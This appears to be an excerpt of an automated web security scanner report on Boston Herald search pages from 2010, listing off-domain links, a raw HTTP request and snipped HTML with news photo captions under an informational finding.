http://bostonherald.com/search/?topic=Homeland+Security+Department&searchSite=recent&srvc=home

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DHomeland%2BSecurity%2BDepartment%26searchSite%3Drecent%26srvc%3Dhome&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://multimedia.heraldinteractive.com/images/20101028/stp/e3712a_Pentagon_10292010.jpg
http://multimedia.heraldinteractive.com/images/20101029/stp/8b7d09_ltpUPSplane102910.jpg
http://multimedia.heraldinteractive.com/images/20101101/bef52a_arizon.jpg
http://multimedia.heraldinteractive.com/images/20101101/stp/833b67_ltpAlAsiri110110.jpg
http://multimedia.heraldinteractive.com/images/20101101/stp/bef52a_arizon.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=Homeland+Security+Department&searchSite=recent&srvc=home HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

8.42. http://bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/search/?topic=Jessica

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DJessica&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://multimedia.heraldinteractive.com/images/20101025/stp/5e2631_frank_10262010.jpg
http://multimedia.heraldinteractive.com/images/20101026/stp/07fb42_immi_10272010.jpg
http://multimedia.heraldinteractive.com/images/20101026/stp/9471bf_tsongas_10272010.jpg
http://multimedia.heraldinteractive.com/images/20101027/stp/0a22bd_Deval_10282010.jpg
http://multimedia.heraldinteractive.com/images/20101027/stp/5fe0fc_harb.jpg
http://multimedia.heraldinteractive.com/images/20101027/stp/a1e75a_chen_10282010.jpg
http://multimedia.heraldinteractive.com/images/20101027/stp/b47d4f_jess_10282010.jpg
http://multimedia.heraldinteractive.com/images/20101027/stp/dac5aa_ltpEMS102710.jpg
http://multimedia.heraldinteractive.com/images/20101028/stp/51671e_dakotas10282010.jpg
http://multimedia.heraldinteractive.com/images/20101028/stp/5922f5_Deval_10292010.jpg
http://multimedia.heraldinteractive.com/images/20101028/stp/a5e013_Waste_Deep_315x275.jpg
http://multimedia.heraldinteractive.com/images/20101029/stp/06f059_Globe_06272009.jpg
http://multimedia.heraldinteractive.com/images/20101029/stp/9abef8_ltpAftermath102910.jpg
http://multimedia.heraldinteractive.com/images/20101029/stp/ac4cef_BU_10292010.jpg
http://multimedia.heraldinteractive.com/images/20101030/stp/0f2202_ltpsweet20101031.jpg
http://multimedia.heraldinteractive.com/images/20101030/stp/20e811_Keating_10312010.jpg
http://multimedia.heraldinteractive.com/images/20101031/stp/243457_cahill_11012010.jpg
http://multimedia.heraldinteractive.com/images/20101031/stp/70746e_baker_11012010.jpg
http://multimedia.heraldinteractive.com/images/20101031/stp/da669b_cisny.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/2d6d0d_BielatvotesA110210.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/6e61eb_Blum_11032010.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/7407ad_ltpBusstabA110210.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/a918e3_ltpBallotmachine110210.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/aa28d6_reid.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/cc96c2_remy_11032010.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/e52329_ltpVotedogwalk110210.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/ea042d_ltpBaker_Patrick110210.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/81117e_BF_11032010.JPG
http://multimedia.heraldinteractive.com/images/20101103/stp/f10c45_Deval_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/a89097_book_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/aecccd_nick_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/39c563_Walsh_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/6d5d99_barney_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/95d5a5_Yacht_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/0ecd46_eagan_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/c36737_ltptv20101107.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/e99f28_oconnell_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/6a40aa_mara_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/6a40aa_mara_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=Jessica Fargen&type=byline&searchSite=recent&x=10&y=10 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:07:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DJessica&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/regional/view.bg?articleid=1294588&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101106/stp/0ecd46_eagan_11072010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/columnists/view.bg?articleid=1294597&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1294589&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1294589">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPoll.gif" alt="Poll" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1294589">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101106/stp/c36737_ltptv20101107.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/entertainment/television/general/view.bg?articleid=1294545&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101107/stp/6a40aa_mara_11072010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101105/stp/39c563_Walsh_11062010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/regional/view.bg?articleid=1294384&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101105/stp/6d5d99_barney_11062010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/business/general/view.bg?articleid=1294371&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101105/stp/95d5a5_Yacht_11062010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1294380&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101104/stp/aecccd_nick_11052010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/track/star_tracks/view.bg?articleid=1294170&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101104/stp/a89097_book_11052010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101103/stp/f10c45_Deval_11042010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/business/media/view.bg?articleid=1293894&format=comments">
...[SNIP]...
<a id="trackMainImage_href" href="/sports/other_sports/general/view.bg?articleid=1294785">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/6a40aa_mara_11072010.jpg" title="The lead women run over the Queensboro Bridge headed for Manhattan during the New York City Marathon on Sunday. The winner, Edna Kiplagat, of Kenya, is fifth from left, in white top. " alt="The lead women run over the Queensboro Bridge headed for Manhattan during the New York City Marathon on Sunday. The winner, Edna Kiplagat, of Kenya, is fifth from left, in white top. ">
</a>
...[SNIP]...
4785" title="Sunday’s NYC Marathon finishers from Massachusetts"
onclick="switchPhoto('185466');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185466" src="http://multimedia.heraldinteractive.com/images/20101107/stp/6a40aa_mara_11072010.jpg" title="The lead women run over the Queensboro Bridge headed for Manhattan during the New York City Marathon on Sunday. The winner, Edna Kiplagat, of Kenya, is fifth from left, in white top. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
nna O’Connell used state rep’s own words in defeating him"
onclick="switchPhoto('185329');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185329" src="http://multimedia.heraldinteractive.com/images/20101106/stp/e99f28_oconnell_11072010.jpg" title="MOVED TO ACT: Republican Shaunna O’Connell ran against Democratic state Rep. James Fagan, left, after she was ‘assaulted’ by his stance on child sex crimes."
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
nna O’Connell used state rep’s own words in defeating him"
onclick="switchPhoto('185328');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185328" src="http://multimedia.heraldinteractive.com/images/20101106/stp/0ecd46_eagan_11072010.jpg" title="James Fagan of Taunton."
alt="Angela Rowlings" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1294589" title="Tim Cahill: Attacks ‘backfired’"
onclick="switchPhoto('185393');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185393" src="http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG" title="Independent Tim Cahill, at home in Quincy, says the negative GOP ad blitz actually helped Democrat Deval Patrick prevail in the race for governor."
alt="Faith Ninivaggi" style="margin:0 2px" />
</a>
...[SNIP]...
ment/television/general/view.bg?articleid=1294545" title="Watch this!"
onclick="switchPhoto('185273');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185273" src="http://multimedia.heraldinteractive.com/images/20101106/stp/c36737_ltptv20101107.jpg" title="Conan O’Brien returns to late night Monday at 11 p.m. on TBS."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
1294384" title="WBZ radio’s morning news anchor to hang up mike"
onclick="switchPhoto('185184');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185184" src="http://multimedia.heraldinteractive.com/images/20101105/stp/39c563_Walsh_11062010.jpg" title="Ed Walsh"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
cs/view.bg?articleid=1294380" title="Towns high and dry on boat taxes"
onclick="switchPhoto('185182');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185182" src="http://multimedia.heraldinteractive.com/images/20101105/stp/95d5a5_Yacht_11062010.jpg" title="DOCKED PAYMENTS: A statewide audit of the current tax system shows that the state uses an ‘antiquated’  system to assess the value of boats such as U.S. Sen. John F. Kerry’s $7 million yacht, above."
alt="Christopher Evans (file)" style="margin:0 2px" />
</a>
...[SNIP]...
general/view.bg?articleid=1294371" title="State money tied into probe"
onclick="switchPhoto('185178');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185178" src="http://multimedia.heraldinteractive.com/images/20101105/stp/6d5d99_barney_11062010.jpg" title="Barney Frank pal S. Donald Sussman."
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
star_tracks/view.bg?articleid=1294170" title="Nick Lachey is engaged!"
onclick="switchPhoto('185073');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185073" src="http://multimedia.heraldinteractive.com/images/20101104/stp/aecccd_nick_11052010.jpg" title="Nick Lachey and Vanessa Minnillo."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
1294139" title="Newton’s New England Mobile Book Fair for sale"
onclick="switchPhoto('185068');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185068" src="http://multimedia.heraldinteractive.com/images/20101104/stp/a89097_book_11052010.jpg" title="STACKS FOR SALE: New England Mobile Book Fair co-owner Johnny Strymish works the shelves of the Newton independent book store, which is for sale.
"
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
rticleid=1293894" title="Democrats’ sweep a boon for talk radio"
onclick="switchPhoto('184826');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184826" src="http://multimedia.heraldinteractive.com/images/20101103/stp/f10c45_Deval_11042010.jpg" title="ON THE AIR: Gov. Deval Patrick, seen with his wife Diane, left, and daughter Katherine, talks to local TV reporters after voting in Milton on Tuesday. Channel 5 won the local media race, drawing 206,250 total viewers."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1293452" title="Testy Barney Frank incensed, even after big win"
onclick="switchPhoto('184702');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184702" src="http://multimedia.heraldinteractive.com/images/20101103/stp/81117e_BF_11032010.JPG" title="QUITE FRANKLY: U.S. Rep. Barney Frank makes his way to the stage at the Crowne Plaza last night in Newton."
alt="Stuart Cahill" style="margin:0 2px" />
</a>
...[SNIP]...
s office, council president team up to oppose Jerry Remy’s plan"
onclick="switchPhoto('184641');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184641" src="http://multimedia.heraldinteractive.com/images/20101102/stp/cc96c2_remy_11032010.jpg" title="TOP THIS: The owners of the popular Jerry Remy’s Sports Bar & Grille, housed in the
former WBCN building in the Fenway, want to add a 350-person bar to the roof."
alt="Angela Rowlings" style="margin:0 2px" />
</a>
...[SNIP]...
e="Richard Blumenthal bests Linda McMahon for Connecticut Senate seat"
onclick="switchPhoto('184628');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184628" src="http://multimedia.heraldinteractive.com/images/20101102/stp/6e61eb_Blum_11032010.jpg" title="Connecticut Attorney General Blumenthal has defeated former World Wrestling Entertainment CEO Linda McMahon for the senate seat being vacated by the retiring Sen. Chris Dodd. "
alt="AP file" style="margin:0 2px" />
</a>
...[SNIP]...
ey Frank bemoans Sean Bielat’s ‘right wing’ tactics"
onclick="switchPhoto('184592');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184592" src="http://multimedia.heraldinteractive.com/images/20101102/stp/2d6d0d_BielatvotesA110210.jpg" title="Candidate for Congress Sean Bielat, his wife Hope, and son Theodore vote in Brookline today."
alt="Mark Garfinkel" style="margin:0 2px" />
</a>
...[SNIP]...
leid=1293348" title="Nevadans electing senator, governor, legislators"
onclick="switchPhoto('184549');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184549" src="http://multimedia.heraldinteractive.com/images/20101102/stp/aa28d6_reid.jpg" title="Christine Lujan picks up campaign material for Nevada Sen. Harry Reid while attending a rally for Reid and featuring former president Bill Clinton Tuesday, Oct. 12, 2010, in Las Vegas."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
.bg?articleid=1293309" title="One dead in double stabbing on MBTA bus"
onclick="switchPhoto('184508');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184508" src="http://multimedia.heraldinteractive.com/images/20101102/stp/7407ad_ltpBusstabA110210.jpg" title="Police investigate a double stabbing on an MBTA bus in front of the Trotter Elementary School in Dorchester at 135 Humboldt Ave. this morning."
alt="Mark Garfinkel" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1293301" title="Turnout up slightly over January special election"
onclick="switchPhoto('184576');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184576" src="http://multimedia.heraldinteractive.com/images/20101102/stp/a918e3_ltpBallotmachine110210.jpg" title="With the help from clerk Daniel Stinetto, Frances and Stanley Falkowski turn in their ballots at the Mary Ellen McCormack Task Force and Senior Center today."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1293301" title="Turnout up slightly over January special election"
onclick="switchPhoto('184496');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184496" src="http://multimedia.heraldinteractive.com/images/20101102/stp/ea042d_ltpBaker_Patrick110210.jpg" title="Gubernatorial candidate Charlie Baker, left, votes at the First Congregational Church of Swampscott this morning while Governor Deval Patrick votes at St. Mary of the Hills School in Milton. "
alt="Nancy Lane, left, Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1293301" title="Turnout up slightly over January special election"
onclick="switchPhoto('184546');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184546" src="http://multimedia.heraldinteractive.com/images/20101102/stp/e52329_ltpVotedogwalk110210.jpg" title="Katherine Hansen has her hands full as she makes her way down Montgomery St. in the South End today."
alt="Patrick Whittemore" style="margin:0 2px" />
</a>
...[SNIP]...
ics/view.bg?articleid=1292946" title="Outside cash floods Mass. races"
onclick="switchPhoto('184234');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184234" src="http://multimedia.heraldinteractive.com/images/20101031/stp/243457_cahill_11012010.jpg" title="MAN OF THE PEOPLE: Independent gubernatorial candidate Tim Cahill talks with Kevin Bonia outside a Dunkin’ Donuts shop in East Boston yesterday."
alt="Faith Ninivaggi" style="margin:0 2px" />
</a>
...[SNIP]...
w.bg?articleid=1292945" title="Poll-watchers keep eyes out for fraud"
onclick="switchPhoto('184231');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184231" src="http://multimedia.heraldinteractive.com/images/20101031/stp/70746e_baker_11012010.jpg" title="SCHILLING FOR VOTES: Republican gubernatorial hopeful Charlie Baker, right, brings the star power of former Sox hurler Curt Schilling to his campaign yesterday at a Chelmsford rally."
alt="Ryan T. Conaty" style="margin:0 2px" />
</a>
...[SNIP]...
bg?articleid=1292840" title="American Alissa Czisny wins Skate Canada"
onclick="switchPhoto('184178');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184178" src="http://multimedia.heraldinteractive.com/images/20101031/stp/da669b_cisny.jpg" title="Alissa Czisny, from the United States, performs her free program to win the gold medal in the ladies competition at the Skate Canada International figure skating competition Saturday, in Kingston, Ontario. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1292717" title="Joe Biden, Bill Keating share ‘laugh’"
onclick="switchPhoto('184085');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184085" src="http://multimedia.heraldinteractive.com/images/20101030/stp/20e811_Keating_10312010.jpg" title="TELL ’EM JOE: Vice President Joe Biden campaigns for Democratic candidate for congress Bill Keating at the Tirrell Room in Quincy. Keating is running to replace the seat being vacated by 10th District Rep. William Delahunt."
alt="Kelvin Ma" style="margin:0 2px" />
</a>
...[SNIP]...
nt/television/general/view.bg?articleid=1292668" title="Sweeps stakes"
onclick="switchPhoto('184018');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184018" src="http://multimedia.heraldinteractive.com/images/20101030/stp/0f2202_ltpsweet20101031.jpg" title="Michael J. Fox plays a shrewd lawyer who faces Alicia (Julianna Margulies) in court on CBS’ “The Good Wife” (Nov. 9). "
alt="David M. Russell" style="margin:0 2px" />
</a>
...[SNIP]...
d=1292505" title="Broker says Globe likely worth only $75 million"
onclick="switchPhoto('183876');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183876" src="http://multimedia.heraldinteractive.com/images/20101029/stp/06f059_Globe_06272009.jpg" title=""
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
e/view.bg?articleid=1292363" title="‘Aftermath’ hits home"
onclick="switchPhoto('183819');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183819" src="http://multimedia.heraldinteractive.com/images/20101029/stp/9abef8_ltpAftermath102910.jpg" title="STRONG ENSEMBLE: Fajer al-Kaisi, Rasha Zamamiri and Omar Koury star in ‘Aftermath.’"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
lege/general/view.bg?articleid=1292340" title="BU riding a hot streak"
onclick="switchPhoto('183778');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
